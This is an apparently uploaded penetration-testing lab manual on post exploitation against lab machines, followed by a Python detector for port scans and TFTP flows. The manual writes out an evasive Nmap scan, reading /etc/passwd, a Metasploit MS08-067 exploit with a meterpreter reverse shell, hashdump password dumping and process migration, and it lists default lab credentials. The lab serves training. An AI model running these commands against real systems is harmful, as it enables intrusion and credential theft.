In God We Trust3

Uploaded by Aris Munandar
© All Rights Reserved
CAST 611 Lab Manual - Post Exploitation - Module 06

Module 06: Post Exploitation

Local Assessment
In this exercise, once a target is exploited, what do we do next? It is important to have planned your post exploitation process so it can be done in a timely manner.

Lab Scenario
We will exploit a target, then perform additional steps to pilfer more information.

Lab Objectives
The objective of this lab is to help students learn to identify vulnerabilities, link an exploit with a vulnerability, review the exploit code, attempt to exploit a target, and finally perform additional steps to pilfer more information. The tasks are as follows:
- Start a target machine (virtual machine)
- Conduct the scanning methodology against the machine
- Identify vulnerabilities
- Search for an exploit
- Compile the exploit
- Attempt to exploit the machine
- Harvest information from an exploited machine
- Grab the password files
- Crack passwords
- Transfer files or copy files to and from an exploited machine

Lab Environment
To carry out this lab, you need:
- Kali Linux
- OWASP virtual machine
- Windows 2003 virtual machine
- Administrative/root privileges to run the tools

CAST 611 Lab Manual, Page 1. Advanced Penetration Testing. Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.

Lab Duration
Time: 80 Minutes

Lab Tasks

TASK 1: Perform Nmap Scan
1. Start the Kali virtual machine. Once the machine boots up, login with a username of root to elevate privileges, and enter a password of toor.
2. The next thing we want to do is to start our OWASP and Server 2003 virtual machines. Once they start up, do not login to the machines. We have to discover them.
3. The first thing we want to do is to scan the range with Nmap and see what we can find.
In a terminal window, enter nmap -f -Pn -v -p- -T4 192.168.100.100,231.
a. We use a fragmented scan to make the scan harder to detect; this is noted by the -f option.
b. This scan will take a while to complete as it scans all ports; this is noted by the -p- option.
Figure 1-1: Nmap scan

TASK 2: Start the OpenVAS Scanner
TASK 3: Perform Scan
4. We have, on more than one occasion, walked you through a number of methods to find the vulnerabilities and then exploit them. At this point we will use our vulnerability scanner to see what it finds, populate our target database with the information received from the Nmap scan, and then we will use OpenVAS to scan for vulnerabilities on our machines.
5. Once the scanner has completed, we are ready for the next step, which is to start OpenVAS.
6. Navigate to Applications | Vulnerability Analysis | openvas start.
7. If all goes well, we are now set up and ready. The next thing to do is to connect to the tool via the web browser. Open an Iceweasel browser and enter https://127.0.0.1:9392.
8. When the login screen comes up, login with admin and a password of adminpw. This should put you in the OpenVAS interface dashboard (Greenbone Security Assistant).
9. In the Quick start wizard, enter the IP address of the OWASP machine and click on Start Scan.
Figure 1-2: OpenVAS interface dashboard (Greenbone Security Assistant)
10. By examining the scan output, you will come to know that most of the vulnerabilities are at a High rating.
11. Our intent here is post exploitation, so we will get to the exploit now. We already know we have the TikiWiki exploit to work with, so we will work with that one first.

TASK 4: Set Up a TFTP Server
12. The next thing we want to do is set up a TFTP server on our Kali machine.
We like to use TFTP since it is lightweight and many of our compromised machines will more than likely have a client available. There are a number of TFTP servers you can install; we will use the atftpd server. In a terminal window, enter apt-get install atftpd.
13. This will download and install the atftpd package.

TASK 5: Bind the TFTP Server
14. We want to bind the TFTP server to the IP address of the Kali virtual machine. This will allow us to set up a TFTP server that we can use to transfer files back and forth.
15. Enter atftpd --daemon --port 69 --bind-address 192.168.100.200 /tmp. A sample of the output of this command can be found in Figure 1-3.
Figure 1-3: atftpd started
16. To verify the server started, enter netstat -anu | grep 69. This will present output similar to what is shown in Figure 1-4.
Figure 1-4: netstat output showing the TFTP listener

TASK 6: Pull the Password File
17. We now have a TFTP server set up; this will handle virtually all of the file transfers that we will need. We will now use the server for our exploration into post exploitation. The first thing we want to do is to pull the password file from the exploited machine. In your shell from the target machine, enter cat /etc/passwd.
Note: This is the shell that we created in Module 05 by exploiting the target machine (refer to Module 05: Exploitation, Lab 04, Figure 4-9).
18. Professional security testing, and especially exploitation, is a process. Next, we are continuing on the planned step-by-step progression. We have access to the compromised machine, and how far we carry out the post exploitation depends on the amount of time we have and the scope of work within our assignment. This is the process, and it takes time and resources, and sometimes it does fail.
Your job as a professional tester is to write it up and produce the information in the delivery report.
19. OK, we spent some time on the Linux machine; we will now shift our focus to the Windows machine.

TASK 7: Start the Metasploit Tool
20. For the Windows machine we will use the Metasploit tool, because it has an advanced shell that we can use to perform a number of local enumeration steps. Start the Metasploit tool by entering the following in a terminal window:
a. service postgresql start
b. msfconsole
Figure 1-5: Starting Metasploit

TASK 8: Exploit the Target Machine
21. If you want to step through the methodology you can, but for the sake of time we will exploit the MS08-067 server service vulnerability. This is one of our most reliable exploits, so it is excellent to use when you are trying for 100% exploitation success. In the Metasploit tool, enter use exploit/windows/smb/ms08_067_netapi.
22. We next want to set the payload. Since we want an advanced shell, we will use the meterpreter shell. Enter set PAYLOAD windows/meterpreter/reverse_tcp.
23. We next want to enter the target; we can use the default target selection or we can use the actual
24. The next thing we do is set up the local host, so we enter set LHOST 192.168.100.200.
25. Now to set up the target machine, so we enter set RHOST 192.168.100.100.
26. We are now ready to try and exploit the machine, so enter exploit.
27. If all goes well, you should see something similar to that being shown in Figure 1-6.
Figure 1-6: Exploit with meterpreter

TASK 9: Crack the Passwords
28. Since we now have a meterpreter shell, we have a lot of advanced things we can do. Enter hashdump.
This will dump the password hashes for the machine; all we have to do is to copy them and then save them to a file. An example of this is shown in Figure 1-7.
Figure 1-7: hashdump showing password hashes
29. We could now save the data and then import it into John the Ripper and attempt to crack passwords.

TASK 10: Collect Additional Information
30. As you can see, the meterpreter shell has many advanced features. We will look at one more, and it is highly recommended that you explore this powerful shell more on your own.
31. The next feature we will look at is the migrate feature. This allows us to migrate from the exploited process to another one. We often like to migrate to the Explorer process, because most users are not going to kill their own desktop. When we exploit something there is a chance that the exploit will crash a process, so we can prevent losing the exploit by migrating the code to another process. In your meterpreter shell, enter ps. This will display the processes currently running on the target machine, as shown in Figure 1-8.
Figure 1-8: Current processes
32. You can migrate to any process that you want; I recommend that you migrate to the explorer process, and you do this by entering the command migrate <PID>.
33. An example of a migrated process command is shown in Figure 1-9.
Figure 1-9: Migrating to another process
34. An important thing to remember is that no matter what OS you compromise you will have command level access, and more importantly local machine access. So your normal local techniques will be very effective. Things to look for:
a. Open Ports
b. Routing
c. Services
35. We can also access a normal shell from the Meterpreter shell; to do this enter the command shell.
Note: Manually locate the path and type dir to list directory contents.
Figure 1-10: Shell on the exploited machine
36. We could also background the session and exploit it again; this is another reason we like to find this vulnerability.
37. This concludes the exercise. Close all windows, and suspend or shut down the virtual machines and clean up from the exercise.

Lab Analysis
After exploiting a machine, it is important that you plan for post exploitation activities; this involves a number of steps.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Internet Connection Required: Yes / No
Platform Supported: Classroom / iLabs
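As an added defensive counterpart to this lab (example code, not part of the CAST 611 manual or its tools): the full-port Nmap scan of step 3 and the TFTP server bound to udp/69 in steps 14-17 both leave a network footprint. The Python below runs over constructed flow-log lines in an assumed "ts src dst proto dport" layout and flags a source that touches many distinct ports on one host, and any flow to udp/69; the addresses are the lab's own Kali (192.168.100.200) and Windows (192.168.100.100) machines.

```python
from collections import defaultdict
from typing import Dict, Iterable, List, Optional, Tuple

SCAN_PORT_THRESHOLD = 50   # distinct destination ports from one source to one host
TFTP_PORT = 69             # the port the lab binds atftpd to


def parse_flow(line: str) -> Optional[dict]:
    """Parse one assumed-format line 'ts src dst proto dport'; None if malformed."""
    parts = line.split()
    if len(parts) != 5:
        return None
    ts, src, dst, proto, dport = parts
    try:
        return {"ts": int(ts), "src": src, "dst": dst,
                "proto": proto.lower(), "dport": int(dport)}
    except ValueError:
        return None


def find_port_scans(lines: Iterable[str],
                    threshold: int = SCAN_PORT_THRESHOLD) -> Dict[Tuple[str, str], int]:
    """Map (src, dst) -> distinct port count for pairs at or above the threshold.
    Fragmentation (-f) does not hide the per-port connection attempts a -p- scan makes."""
    ports = defaultdict(set)
    for line in lines:
        rec = parse_flow(line)
        if rec is not None:
            ports[(rec["src"], rec["dst"])].add(rec["dport"])
    return {pair: len(p) for pair, p in ports.items() if len(p) >= threshold}


def find_tftp_flows(lines: Iterable[str]) -> List[Tuple[str, str]]:
    """Return sorted (src, dst) pairs talking to udp/69; TFTP is unauthenticated,
    so a server initiating it deserves a look."""
    hits = set()
    for line in lines:
        rec = parse_flow(line)
        if rec is not None and rec["proto"] == "udp" and rec["dport"] == TFTP_PORT:
            hits.add((rec["src"], rec["dst"]))
    return sorted(hits)


def constructed_log() -> List[str]:
    """Constructed sample: normal web hits, a 200-port sweep from the Kali address
    against the Windows target, one TFTP flow back to Kali, one malformed line."""
    lines = [f"{1000 + i} 10.0.0.5 192.168.100.100 tcp 80" for i in range(3)]
    lines += [f"2000 192.168.100.200 192.168.100.100 tcp {p}" for p in range(1, 201)]
    lines += ["3000 192.168.100.100 192.168.100.200 udp 69", "not a flow record"]
    return lines


if __name__ == "__main__":
    log = constructed_log()
    print("port scans:", find_port_scans(log))
    print("tftp flows:", find_tftp_flows(log))
```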
